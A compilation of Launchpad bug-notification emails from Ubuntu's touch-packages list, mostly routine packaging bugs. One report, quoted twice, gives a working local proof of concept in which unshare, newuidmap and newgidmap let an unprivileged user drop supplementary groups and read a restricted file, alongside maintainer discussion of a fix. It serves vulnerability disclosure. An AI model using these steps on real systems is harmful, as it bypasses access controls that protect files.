[Touch-packages] [Bug 1321854] Re: useradd doesn't add the default shell to /etc/passwd entry

[Serge Hallyn]

Tested this in eoan.  New user got the SHELL=zsh which I specified in
/etc/default/useradd

** Changed in: shadow (Ubuntu)
   Status: Triaged => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1321854

Title:
  useradd doesn't add the default shell to /etc/passwd entry

Status in shadow package in Ubuntu:
  Fix Released
Status in shadow source package in Trusty:
  Triaged

Bug description:
  useradd is not honoring the default shell listed in
  /etc/defaults/useradd when creating new users.

  useradd -D showing the defaults. SHELL=/bin/bash

  # useradd -D
  GROUP=100
  HOME=/home
  INACTIVE=-1
  EXPIRE=
  SHELL=/bin/bash
  SKEL=/etc/skel
  CREATE_MAIL_SPOOL=no

  Using useradd to create user test1. The /etc/passwd entry has a blank
  shell field:

  # useradd test1
  # grep test1 /etc/passwd
  test1:x:2080:2080::/home/test1:

  Using useradd -s does populate the shell field:
  # useradd -s /bin/bash test2
  #grep test2 /etc/passwd
  test2:x:2081:2081::/home/test2:/bin/bash

  Why useradd instead of adduser: puppet uses useradd to do user
  creation.

  ProblemType: Bug
  DistroRelease: Ubuntu 14.04
  Package: passwd 1:4.1.5.1-1ubuntu9
  ProcVersionSignature: Ubuntu 3.13.0-24.47-generic 3.13.9
  Uname: Linux 3.13.0-24-generic x86_64
  ApportVersion: 2.14.1-0ubuntu3
  Architecture: amd64
  Date: Wed May 21 17:51:57 2014
  Ec2AMI: ami-42dc302a
  Ec2AMIManifest: (unknown)
  Ec2AvailabilityZone: us-east-1d
  Ec2InstanceType: m3.large
  Ec2Kernel: aki-919dcaf8
  Ec2Ramdisk: unavailable
  ProcEnviron:
   TERM=xterm
   PATH=(custom, no user)
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: shadow
  UpgradeStatus: No upgrade log present (probably fresh install)
  mtime.conffile..etc.default.useradd: 2014-05-21T17:36:05.208686

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1321854/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1174939] Re: [HDA-Intel - HDA Intel PCH, playback] Sound is distorted

[Serge Andrusenko]

Not the issue anymore

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to alsa-driver in Ubuntu.
https://bugs.launchpad.net/bugs/1174939

Title:
  [HDA-Intel - HDA Intel PCH, playback] Sound is distorted

Status in alsa-driver package in Ubuntu:
  Incomplete

Bug description:
  time after time blayback sound is broke and it sound like "digital"
  noice with normaly (see example fil. Sorry for bad quality, recording
  from microphone)

  ProblemType: Bug
  DistroRelease: Ubuntu 13.04
  Package: alsa-base 1.0.25+dfsg-0ubuntu4
  ProcVersionSignature: Ubuntu 3.8.0-19.29-generic 3.8.8
  Uname: Linux 3.8.0-19-generic x86_64
  NonfreeKernelModules: nvidia
  ApportVersion: 2.9.2-0ubuntu8
  Architecture: amd64
  Date: Tue Apr 30 23:57:15 2013
  InstallationDate: Installed on 2012-12-10 (140 days ago)
  InstallationMedia: Ubuntu 12.10 "Quantal Quetzal" - Release amd64 (20121017.5)
  MarkForUpload: True
  PackageArchitecture: all
  SourcePackage: alsa-driver
  Symptom: audio
  Symptom_AlsaPlaybackTest: ALSA playback test through plughw:PCH successful
  Symptom_Card: Webcam C310 - USB Device 0x46d:0x81b
  Symptom_PulsePlaybackTest: PulseAudio playback test successful
  Symptom_Type: Digital clip or distortion, or "overdriven" sound
  Title: [HDA-Intel - HDA Intel PCH, playback] Sound is distorted
  UpgradeStatus: Upgraded to raring on 2013-04-25 (5 days ago)
  dmi.bios.date: 07/24/2012
  dmi.bios.vendor: American Megatrends Inc.
  dmi.bios.version: V10.4
  dmi.board.asset.tag: To be filled by O.E.M.
  dmi.board.name: B75A-G43 (MS-7758)
  dmi.board.vendor: MSI
  dmi.board.version: 2.0
  dmi.chassis.asset.tag: To Be Filled By O.E.M.
  dmi.chassis.type: 3
  dmi.chassis.vendor: MSI
  dmi.chassis.version: 2.0
  dmi.modalias: 
dmi:bvnAmericanMegatrendsInc.:bvrV10.4:bd07/24/2012:svnMSI:pnMS-7758:pvr2.0:rvnMSI:rnB75A-G43(MS-7758):rvr2.0:cvnMSI:ct3:cvr2.0:
  dmi.product.name: MS-7758
  dmi.product.version: 2.0
  dmi.sys.vendor: MSI

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/1174939/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1840375] Re: groupdel doesn't support extrausers

[Serge Hallyn]

Hi,

can I interest anyone in pushing the extrausers patch as a PR to
github.com/shadow-maint/shadow?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1840375

Title:
  groupdel doesn't support extrausers

Status in snapd:
  New
Status in shadow package in Ubuntu:
  Fix Released
Status in shadow source package in Xenial:
  Fix Committed
Status in shadow source package in Bionic:
  Fix Committed
Status in shadow source package in Disco:
  Fix Committed

Bug description:
  snapd needs the ability to call 'groupdel --extrausers foo' to clean
  up after itself, but --extrausers is currently unsupported.

  [Impact] 
  On ubuntu-core systems we want to be able to manage "extrausers" in the same
  way as regular users. This requires updates to the various 
{user,group}{add,del} tools. Right now "groupdel" cannot handle extrausers.

  This is an important feature for Ubuntu Core

  [Test Case]
  1. install the libnss-extrausers and configure it
  2. run "groupadd --extrausers foo"
  3  check /var/lib/extrausers/group for the new "foo" group
  4. run "groupdel --extrausers foo"
  5. check /var/lib/extrausers/group and ensure the "foo" group is removed

  [Regression Potential]

   * low: this adds a new (optional) option which is off by default

To manage notifications about this bug go to:
https://bugs.launchpad.net/snapd/+bug/1840375/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1757091] Re: systemctl enable lightdm

[Serge Hartmann]

Is there a workaround tip in order to re-enable lightdm in ubuntu 18.04
? I am using systemd.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1757091

Title:
  systemctl enable lightdm

Status in lightdm package in Ubuntu:
  Confirmed

Bug description:
  Synchronizing state of lightdm.service with SysV service script with 
/lib/systemd/systemd-sysv-install.
  Executing: /lib/systemd/systemd-sysv-install enable lightdm
  The unit files have no installation config (WantedBy, RequiredBy, Also, Alias
  settings in the [Install] section, and DefaultInstance for template units).
  This means they are not meant to be enabled using systemctl.
  Possible reasons for having this kind of units are:
  1) A unit may be statically enabled by being symlinked from another unit's
 .wants/ or .requires/ directory.
  2) A unit's purpose may be to act as a helper for some other unit which has
 a requirement dependency on it.
  3) A unit may be started when needed via activation (socket, path, timer,
 D-Bus, udev, scripted systemctl call, ...).
  4) In case of template units, the unit is meant to be enabled with some
 instance name specified.

  ProblemType: Bug
  DistroRelease: Ubuntu 17.10
  Package: lightdm 1.24.0-0ubuntu1
  ProcVersionSignature: Ubuntu 4.13.0-37.42-generic 4.13.13
  Uname: Linux 4.13.0-37-generic x86_64
  NonfreeKernelModules: nvidia_uvm nvidia_drm nvidia_modeset nvidia
  ApportVersion: 2.20.7-0ubuntu3.7
  Architecture: amd64
  Date: Tue Mar 20 11:44:46 2018
  InstallationDate: Installed on 2018-01-22 (57 days ago)
  InstallationMedia: Ubuntu-Server 17.10 "Artful Aardvark" - Release amd64 
(20171017.1)
  ProcEnviron:
   TERM=xterm
   PATH=(custom, no user)
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: lightdm
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1757091/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1782825] [NEW] missing symlink for library

[Serge Hallyn]

Public bug reported:

On bionic, I needed to

ln -s /lib/x86_64-linux-gnu/libdevmapper.so.1.02.1 /lib/x86_64-linux-
gnu/libdevmapper.so.1.02

in order for some previously built programs (like skopeo) to continue to
work.

** Affects: lvm2 (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lvm2 in Ubuntu.
https://bugs.launchpad.net/bugs/1782825

Title:
  missing symlink for library

Status in lvm2 package in Ubuntu:
  New

Bug description:
  On bionic, I needed to

  ln -s /lib/x86_64-linux-gnu/libdevmapper.so.1.02.1 /lib/x86_64-linux-
  gnu/libdevmapper.so.1.02

  in order for some previously built programs (like skopeo) to continue
  to work.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lvm2/+bug/1782825/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1778984] [NEW] Parse error of /etc/apparmor.d/tunables/home.d/ubuntu after unattended-upgrades

[Serge Yagolnikov]

Public bug reported:

Environment:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/;
SUPPORT_URL="http://help.ubuntu.com/;
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/;
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial

Docker Details:
Client:
 Version:  17.06.2-ce
 API version:  1.30
 Go version:   go1.8.3
 Git commit:   cec0b72
 Built:Tue Sep  5 20:00:17 2017
 OS/Arch:  linux/amd64

Server:
 Version:  17.06.2-ce
 API version:  1.30 (minimum version 1.12)
 Go version:   go1.8.3
 Git commit:   cec0b72
 Built:Tue Sep  5 19:59:11 2017
 OS/Arch:  linux/amd64
 Experimental: false


Problem: Docker containers will not restart due error 
/etc/apparmor.d/tunables/home.d/ubuntu at line 7: Found unexpected character: ''


How to recreate problem:
1. initiate unattended upgrades: sudo unattened-upgrades -d 
2. Wait until Apparmor is installing...

Installing new version of config file /etc/init.d/apparmor ...
Installing new version of config file /etc/init/apparmor.conf ...
update-rc.d: warning: start and stop actions are no longer supported; falling 
back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd

3. Pull the power from the computer to simulate a complete power failure.
4. Plug the system back in and try to restart a docker container using "sudo 
docker restart  
Error upon attempting to restart docker container:
Error response from daemon: Cannot restart container updater-nodejs: AppArmor 
enabled on system but the docker-default profile could not be loaded: running 
/sbin/apparmor_parser apparmor_parser -Kr 
/var/lib/docker/tmp/docker-default480199246 failed with output: AppArmor parser 
error for /var/lib/docker/tmp/docker-default480199246 in 
/etc/apparmor.d/tunables/home.d/ubuntu at line 7: Found unexpected character: ''

error: exit status 1

** Affects: apparmor (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1778984

Title:
  Parse error of /etc/apparmor.d/tunables/home.d/ubuntu after
  unattended-upgrades

Status in apparmor package in Ubuntu:
  New

Bug description:
  Environment:
  DISTRIB_ID=Ubuntu
  DISTRIB_RELEASE=16.04
  DISTRIB_CODENAME=xenial
  DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
  NAME="Ubuntu"
  VERSION="16.04.2 LTS (Xenial Xerus)"
  ID=ubuntu
  ID_LIKE=debian
  PRETTY_NAME="Ubuntu 16.04.2 LTS"
  VERSION_ID="16.04"
  HOME_URL="http://www.ubuntu.com/;
  SUPPORT_URL="http://help.ubuntu.com/;
  BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/;
  VERSION_CODENAME=xenial
  UBUNTU_CODENAME=xenial

  Docker Details:
  Client:
   Version:  17.06.2-ce
   API version:  1.30
   Go version:   go1.8.3
   Git commit:   cec0b72
   Built:Tue Sep  5 20:00:17 2017
   OS/Arch:  linux/amd64

  Server:
   Version:  17.06.2-ce
   API version:  1.30 (minimum version 1.12)
   Go version:   go1.8.3
   Git commit:   cec0b72
   Built:Tue Sep  5 19:59:11 2017
   OS/Arch:  linux/amd64
   Experimental: false

  
  Problem: Docker containers will not restart due error 
/etc/apparmor.d/tunables/home.d/ubuntu at line 7: Found unexpected character: ''

  
  How to recreate problem:
  1. initiate unattended upgrades: sudo unattened-upgrades -d 
  2. Wait until Apparmor is installing...

  Installing new version of config file /etc/init.d/apparmor ...
  Installing new version of config file /etc/init/apparmor.conf ...
  update-rc.d: warning: start and stop actions are no longer supported; falling 
back to defaults
  Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd

  3. Pull the power from the computer to simulate a complete power failure.
  4. Plug the system back in and try to restart a docker container using "sudo 
docker restart  
  Error upon attempting to restart docker container:
  Error response from daemon: Cannot restart container updater-nodejs: AppArmor 
enabled on system but the docker-default profile could not be loaded: running 
/sbin/apparmor_parser apparmor_parser -Kr 
/var/lib/docker/tmp/docker-default480199246 failed with output: AppArmor parser 
error for /var/lib/docker/tmp/docker-default480199246 in 
/etc/apparmor.d/tunables/home.d/ubuntu at line 7: Found unexpected character: ''

  error: exit status 1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1778984/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1164016] Re: restore type-ahead find

[Serge]

Unfortunately this is really a deal-breaker for me and forces me to drop
Nautilus and experiment with other, perhaps not so well
developed/maintained, GUI file managers. What a pity.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-settings in Ubuntu.
https://bugs.launchpad.net/bugs/1164016

Title:
  restore type-ahead find

Status in Nautilus:
  Expired
Status in nautilus package in Ubuntu:
  Fix Released
Status in ubuntu-settings package in Ubuntu:
  Fix Released

Bug description:
  GNOME removed type-ahead find in Nautilus 3.6, not without
  controversy:

  https://mail.gnome.org/archives/nautilus-
  list/2012-August/msg2.html

  Now when you type in a Nautilus window, Nautilus immediately performs
  a search in the current directory and all its subdirectories.  I
  personally find this annoying.  If I want to search, I'll click the
  search icon.  Often I'm looking at a long directory listing and simply
  want to jump to a certain point in it, and type-ahead find works great
  for that.

  Would Ubuntu consider patching type-ahead find back in?

To manage notifications about this bug go to:
https://bugs.launchpad.net/nautilus/+bug/1164016/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1303649] Re: systemd-logind spins in cgmanager_ping_sync()

[Serge Hallyn]

Could you find the pid of cgmanager ( 353 below)‎ and do

Strafe -f -p 353 -o trace.txt

for maybe 5 seconds, ctrl-c it, and attach trace.txt here?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1303649

Title:
  systemd-logind spins in cgmanager_ping_sync()

Status in cgmanager package in Ubuntu:
  Invalid
Status in libnih package in Ubuntu:
  Invalid
Status in lxc package in Ubuntu:
  Fix Released
Status in systemd package in Ubuntu:
  Fix Released

Bug description:
  systemd-logind is consuming a high level of cpu on a continual basis:

PID USER  PR  NIVIRTRESSHR S  %CPU %MEM TIME+ COMMAND   
 
676 root  20   0   43644   2144   1568 R 100.0  0.0  74:43.77 
systemd-logind

  ProblemType: Bug
  DistroRelease: Ubuntu 14.04
  Package: systemd-services 204-5ubuntu17
  ProcVersionSignature: Ubuntu 3.13.0-22.44-generic 3.13.8
  Uname: Linux 3.13.0-22-generic x86_64
  ApportVersion: 2.14.1-0ubuntu1
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Mon Apr  7 09:09:37 2014
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-04-23 (348 days ago)
  InstallationMedia: Ubuntu 13.04 "Raring Ringtail" - Release amd64 (20130423)
  SourcePackage: systemd
  UpgradeStatus: Upgraded to trusty on 2013-11-11 (146 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1303649/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1729357] Re: unprivileged user can drop supplementary groups

[Serge Hallyn]

@stgraber @mdeslaur - I'd considered making a release for Ubuntu...  but
this is the negative acl thing...  Your opinions appreciated.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1729357

Title:
  unprivileged user can drop supplementary groups

Status in shadow package in Ubuntu:
  Confirmed
Status in shadow package in openSUSE:
  Confirmed

Bug description:
  Distribution: Ubuntu 16.04.3 LTS
  Kernel: 4.4.0-97-generic
  uidmap package version: 1:4.2-3.1ubuntu5.3

  The newgidmap setuid executable allows any user to write a single
  mapping line to the gid_map of a process whose identity is the same as
  the calling process, as long as that mapping line maps the process's
  own GID outside of the user namespace to GID 0 inside the user
  namespace.

  Newgidmap will write the mapping regardless of the content of
  /proc/$process_being_mapped/setgroups, which will initially contain
  the string "allow". After this mapping is performed, and also after
  the process' uid_map is written with newuidmap, the process in the
  user namespace will be able to use the setgroups system call to drop
  supplementary groups.

  This is possible even if there is no entry for the user in
  /etc/subgid, because no subordinate GIDs are actually being used.

  This allows any user to circumvent the use of supplementary groups as
  blacklists, e.g. for some file owned by root:blacklist with permission
  bits 0604 (octal). Normally any process whose identity included the
  group "blacklist" in its supplementary groups would not be able to
  read that file. By performing this exploit using newgidmap, they can
  drop all supplementary groups and read that file.

  If newgidmap was not available, unprivileged users would not be able
  to write a process's gid_map until writing "deny" to
  /proc/$pid/setgroups. A fix for this might be for newgidmap to check
  the content of /proc/$process_being_mapped/setgroups is "deny", but we
  have not tried to patch this ourselves.

  An example using 2 login shells for a user named "someone" on Ubuntu
  Xenial, with the uidmap package installed:

  Shell 1

  someone@ubuntu-xenial:~$ id
  uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted)

  someone@ubuntu-xenial:~$ ls -al /tmp/should_restrict
  -rwr-- 1 root restricted 8 Nov  1 12:23 /tmp/should_restrict

  someone@ubuntu-xenial:~$ cat /tmp/should_restrict
  cat: /tmp/should_restrict: Permission denied

  someone@ubuntu-xenial:~$ unshare -U --setgroups allow #
  /proc/self/setgroups already contains 'allow', but let's be explicit

  nobody@ubuntu-xenial:~$ echo $$
  1878

  Shell 2

  someone@ubuntu-xenial:~$ cat /etc/subuid
  lxd:10:65536
  root:10:65536
  ubuntu:165536:65536

  someone@ubuntu-xenial:~$ cat /etc/subgid
  lxd:10:65536
  root:10:65536
  ubuntu:165536:65536

  # There are no entries in /etc/sub{u,g}id for someone, but this
  doesn't matter that much as subordinate IDs are not being requested.

  someone@ubuntu-xenial:~$ newuidmap 1878 0 1001 1

  someone@ubuntu-xenial:~$ newgidmap 1878 0 1001 1

  Back to shell 1

  nobody@ubuntu-xenial:~$ id
  uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

  # The presence of the "nogroup" supplementary group indicates that
  some unmapped GIDs are present as supplementary GIDs. The kernel knows
  that this process still has "restricted" in its supplementary groups,
  so it can't read the restricted file yet.

  nobody@ubuntu-xenial:~$ cat /tmp/should_restrict
  cat: /tmp/should_restrict: Permission denied

  # The process has gained CAP_SETGID in its user namespace by becoming
  UID 0. /proc/$pid/setgroups contains "allow", so it can call
  setgroups(2). By su-ing to root (itself, in the user namespace), it
  can drop the supplementary groups. It can't read /root/.bashrc as that
  file is owned by UID 0 in the initial user namespace, which creates
  some distracting error output but doesn't matter in this case.

  nobody@ubuntu-xenial:~$ su root
  su: Authentication failure
  (Ignored)
  bash: /root/.bashrc: Permission denied

  # Supplementary groups have been dropped

  root@ubuntu-xenial:~# id
  uid=0(root) gid=0(root) groups=0(root)

  # It can read the restricted file

  root@ubuntu-xenial:~# cat /tmp/should_restrict
  content

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1303649] Re: systemd-logind spins in cgmanager_ping_sync()

[Serge Hallyn]

Hi,

just to get this straight to narrow down scenarios to try to reproduce:

1. Dale with 16.04 you are *not* seeing this, right?  You saw it with
14.04 with proposed enabled?

2. Marcelo, you are seeing this with 14.04.5 with proposed enabled?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1303649

Title:
  systemd-logind spins in cgmanager_ping_sync()

Status in cgmanager package in Ubuntu:
  Invalid
Status in libnih package in Ubuntu:
  Invalid
Status in lxc package in Ubuntu:
  Fix Released
Status in systemd package in Ubuntu:
  Fix Released

Bug description:
  systemd-logind is consuming a high level of cpu on a continual basis:

PID USER  PR  NIVIRTRESSHR S  %CPU %MEM TIME+ COMMAND   
 
676 root  20   0   43644   2144   1568 R 100.0  0.0  74:43.77 
systemd-logind

  ProblemType: Bug
  DistroRelease: Ubuntu 14.04
  Package: systemd-services 204-5ubuntu17
  ProcVersionSignature: Ubuntu 3.13.0-22.44-generic 3.13.8
  Uname: Linux 3.13.0-22-generic x86_64
  ApportVersion: 2.14.1-0ubuntu1
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Mon Apr  7 09:09:37 2014
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-04-23 (348 days ago)
  InstallationMedia: Ubuntu 13.04 "Raring Ringtail" - Release amd64 (20130423)
  SourcePackage: systemd
  UpgradeStatus: Upgraded to trusty on 2013-11-11 (146 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1303649/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1700814] Re: Default capability of cap_setfcap+i should be set on setcap

[Serge Hallyn]

Even unprivileged containers are now usable in containers with the right
kernel, so this would be a good thing to add to the packaging.

I'm not sure when I'll have time, but assigning to myself so that I can
more easily find it when I do.

** Changed in: libcap2 (Ubuntu)
 Assignee: (unassigned) => Serge Hallyn (serge-hallyn)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcap2 in Ubuntu.
https://bugs.launchpad.net/bugs/1700814

Title:
  Default capability of cap_setfcap+i should be set on setcap

Status in libcap2 package in Ubuntu:
  New

Bug description:
  If I grant a user (via pam_cap) cap_setfcap+i, I would then expect
  them to be able to use setcap without sudo. setcap is not provided
  with any default file capabilities however, so either the user has to
  sudo, or I have to grant the setfcap capability to setcap with setcap.

  In my mind, it would be reasonable to grant setfcap+i to setcap by
  default on installation.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700814/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1704416] Re: CAP_AUDIT_READ is not supported on Xenial

[Serge Hallyn]

Sorry - if this is still an issue, please reply here.

** Changed in: libcap2 (Ubuntu)
 Assignee: (unassigned) => Serge Hallyn (serge-hallyn)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcap2 in Ubuntu.
https://bugs.launchpad.net/bugs/1704416

Title:
  CAP_AUDIT_READ is not supported on Xenial

Status in libcap2 package in Ubuntu:
  New

Bug description:
  I'm encountering the same issue as #1451601 describes. The fix, a more
  recent libcap2 2.25, has made it into the Yakkety distribution but not
  Xenial.

  Summary of the problem: One cannot raise or lower CAP_AUDIT_READ,
  which is equal to decimal value 37. As compiled, libcap2 2.24 supports
  up to CAP_BLOCK_SUSPEND (36).

  lsb_release -rd
  Description:  Ubuntu 16.04.2 LTS
  Release:  16.04

  apt-cache policy libcap2
  libcap2:
Installed: 1:2.24-12
Candidate: 1:2.24-12
Version table:
   *** 1:2.24-12 500
  500 http://us.archive.ubuntu.com/ubuntu xenial/main amd64 Packages
  100 /var/lib/dpkg/status

  
  setcap cap_audit_read=eip /bin/ls
  fatal error: Invalid argument
  usage: setcap [-q] [-v] (-r|-|)  [ ... (-r|-|) 
 ]

   Note  must be a regular (non-symlink) file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1704416/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

Re: [Touch-packages] [Bug 1729357] Re: unprivileged user can drop supplementary groups

[Serge Hallyn]

This sounds acceptable to me.  Issues or (even better) PRs against
github.com/shadow-maint/shadow would be great :)

Indeed the default should be the more permissible.  (I won't accept
patches which require changes to the container runtime.)


On Mon, Jan 15, 2018 at 9:13 AM, Akihiro Suda  wrote:
>> And we define flags "allow_setgroups" and "deny_setgrouops" (with
> "deny_setgroups" being the default).
>
>
> I think allow_setgropus should be the default for keeping compatibility.
>
> However, useradd(8) may print warning for the default configuration.
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1729357
>
> Title:
>   unprivileged user can drop supplementary groups
>
> Status in shadow package in Ubuntu:
>   Confirmed
>
> Bug description:
>   Distribution: Ubuntu 16.04.3 LTS
>   Kernel: 4.4.0-97-generic
>   uidmap package version: 1:4.2-3.1ubuntu5.3
>
>   The newgidmap setuid executable allows any user to write a single
>   mapping line to the gid_map of a process whose identity is the same as
>   the calling process, as long as that mapping line maps the process's
>   own GID outside of the user namespace to GID 0 inside the user
>   namespace.
>
>   Newgidmap will write the mapping regardless of the content of
>   /proc/$process_being_mapped/setgroups, which will initially contain
>   the string "allow". After this mapping is performed, and also after
>   the process' uid_map is written with newuidmap, the process in the
>   user namespace will be able to use the setgroups system call to drop
>   supplementary groups.
>
>   This is possible even if there is no entry for the user in
>   /etc/subgid, because no subordinate GIDs are actually being used.
>
>   This allows any user to circumvent the use of supplementary groups as
>   blacklists, e.g. for some file owned by root:blacklist with permission
>   bits 0604 (octal). Normally any process whose identity included the
>   group "blacklist" in its supplementary groups would not be able to
>   read that file. By performing this exploit using newgidmap, they can
>   drop all supplementary groups and read that file.
>
>   If newgidmap was not available, unprivileged users would not be able
>   to write a process's gid_map until writing "deny" to
>   /proc/$pid/setgroups. A fix for this might be for newgidmap to check
>   the content of /proc/$process_being_mapped/setgroups is "deny", but we
>   have not tried to patch this ourselves.
>
>   An example using 2 login shells for a user named "someone" on Ubuntu
>   Xenial, with the uidmap package installed:
>
>   Shell 1
>
>   someone@ubuntu-xenial:~$ id
>   uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted)
>
>   someone@ubuntu-xenial:~$ ls -al /tmp/should_restrict
>   -rwr-- 1 root restricted 8 Nov  1 12:23 /tmp/should_restrict
>
>   someone@ubuntu-xenial:~$ cat /tmp/should_restrict
>   cat: /tmp/should_restrict: Permission denied
>
>   someone@ubuntu-xenial:~$ unshare -U --setgroups allow #
>   /proc/self/setgroups already contains 'allow', but let's be explicit
>
>   nobody@ubuntu-xenial:~$ echo $$
>   1878
>
>   Shell 2
>
>   someone@ubuntu-xenial:~$ cat /etc/subuid
>   lxd:10:65536
>   root:10:65536
>   ubuntu:165536:65536
>
>   someone@ubuntu-xenial:~$ cat /etc/subgid
>   lxd:10:65536
>   root:10:65536
>   ubuntu:165536:65536
>
>   # There are no entries in /etc/sub{u,g}id for someone, but this
>   doesn't matter that much as subordinate IDs are not being requested.
>
>   someone@ubuntu-xenial:~$ newuidmap 1878 0 1001 1
>
>   someone@ubuntu-xenial:~$ newgidmap 1878 0 1001 1
>
>   Back to shell 1
>
>   nobody@ubuntu-xenial:~$ id
>   uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
>
>   # The presence of the "nogroup" supplementary group indicates that
>   some unmapped GIDs are present as supplementary GIDs. The kernel knows
>   that this process still has "restricted" in its supplementary groups,
>   so it can't read the restricted file yet.
>
>   nobody@ubuntu-xenial:~$ cat /tmp/should_restrict
>   cat: /tmp/should_restrict: Permission denied
>
>   # The process has gained CAP_SETGID in its user namespace by becoming
>   UID 0. /proc/$pid/setgroups contains "allow", so it can call
>   setgroups(2). By su-ing to root (itself, in the user namespace), it
>   can drop the supplementary groups. It can't read /root/.bashrc as that
